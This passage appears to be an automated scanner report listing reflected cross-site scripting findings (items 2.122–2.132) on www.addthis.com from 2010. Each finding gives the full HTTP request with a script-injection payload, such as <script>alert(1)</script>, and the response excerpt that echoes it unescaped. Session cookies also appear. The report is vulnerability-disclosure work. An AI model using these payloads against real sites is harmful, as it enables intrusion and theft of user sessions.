<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMTe9c29<script>alert(1)</script>f5118c59dad</strong>
...[SNIP]...

2.122. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ea55f<script>alert(1)</script>15dfb687cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT?ea55f<script>alert(1)</script>15dfb687cb8=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT?ea55f<script>alert(1)</script>15dfb687cb8=1</strong>
...[SNIP]...

2.123. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ddd0"-alert(1)-"6d181bcf17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services8ddd0"-alert(1)-"6d181bcf17d/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services8ddd0"-alert(1)-"6d181bcf17d/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}

...[SNIP]...

2.124. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 307df<script>alert(1)</script>bd5fc24f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services307df<script>alert(1)</script>bd5fc24f23/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services307df<script>alert(1)</script>bd5fc24f23/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC</strong>
...[SNIP]...

2.125. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db573<script>alert(1)</script>f9e1a86c09d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3Cdb573<script>alert(1)</script>f9e1a86c09d/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3Cdb573<script>alert(1)</script>f9e1a86c09d/script%3EHOYTLLC</strong>
...[SNIP]...

2.126. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81be2"-alert(1)-"71b90c0a1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C81be2"-alert(1)-"71b90c0a1d1/script%3EHOYTLLC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C81be2"-alert(1)-"71b90c0a1d1/script%3EHOYTLLC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTr
...[SNIP]...

2.127. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38562<script>alert(1)</script>40e45f429b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC38562<script>alert(1)</script>40e45f429b9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC38562<script>alert(1)</script>40e45f429b9</strong>
...[SNIP]...

2.128. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 227f5"-alert(1)-"d6b59968138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC227f5"-alert(1)-"d6b59968138 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC227f5"-alert(1)-"d6b59968138";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.129. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25f7b<script>alert(1)</script>51cc3c6a826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC?25f7b<script>alert(1)</script>51cc3c6a826=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC?25f7b<script>alert(1)</script>51cc3c6a826=1</strong>
...[SNIP]...

2.130. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beebb"-alert(1)-"e38d13d71e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=n8vgn509dukuh80gfrle1a9ug2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx
...[SNIP]...

2.131. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ecf5<script>alert(1)</script>225f6a9584 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=uv8f494h43h01fqra5pp1k3sv4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130</strong>
...[SNIP]...

2.132. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a576<script>alert(1)</script>28122e63156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=8ubi0bfslihqmjfcvl1u62r5u2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
